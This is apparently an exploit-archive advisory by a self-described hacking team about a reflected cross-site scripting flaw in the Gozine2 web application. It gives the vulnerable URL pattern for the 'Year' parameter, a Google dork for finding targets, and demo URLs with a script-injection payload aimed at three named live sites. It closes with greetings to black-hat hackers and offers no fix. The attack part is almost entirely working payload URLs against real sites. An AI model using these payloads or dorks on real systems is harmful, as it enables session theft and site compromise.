Gazine2 suffers from a cross site scripting vulnerability. Note that this finding houses site-specific data.
7fa4e5d5e20307e2c56a0df96c4f1476a397f5b02ed278d9f472b80ebc330323
################################################################
----------------------------------------------------------------
Gozine2 <= Cross Site Scripting Vulnerabilities
----------------------------------------------------------------
################################################################
# Exploit Title : Gozine2 <= Cross Site Scripting VulnerabilitieS
# Author : Hack Center Security Team
# Discovered By : Net.W0lf
# Software Link : [ www.gozine2.ir ]
# Impact : [ High ]
# My site : Net-W0lf.blogspot.com
# E-Mail : Bl4ck.Intell@gmail.com & Net-W0lf@att.net
# Dork : "?????? ???? ? ???????? ???? ???? ???? ????? ??"
################################################################
----------------------------------------------------------------
+-----------------------+
| Cross Site scripting |
+-----------------------+
3xpl0!T :
[TaRgeT]/modules.php?name=Result_Cards&op=ResultCards&Field_ID=&Year=[xss]
Dem0:
www.gozine2.ir/modules.php?name=Result_Cards&op=ResultCards&Field_ID=&Year=<script>alert(/0/)</script>
www.gozineyejavan.ir/modules.php?name=Result_Cards&op=ResultCards&Field_ID=&Year=<script>alert(/0/)</script>
www.gozine2.co/modules.php?name=Result_Cards&op=ResultCards&Field_ID=&Year=<script>alert(/0/)</script>
GreetZ To :
| Am!r | B3HZ4D | PacketStormSecurity.org | Exploit-db.Com |
| And All Iranian Black Hat HackerZ |
Persian Gulf 4 Ever
===========================================# End #=============================================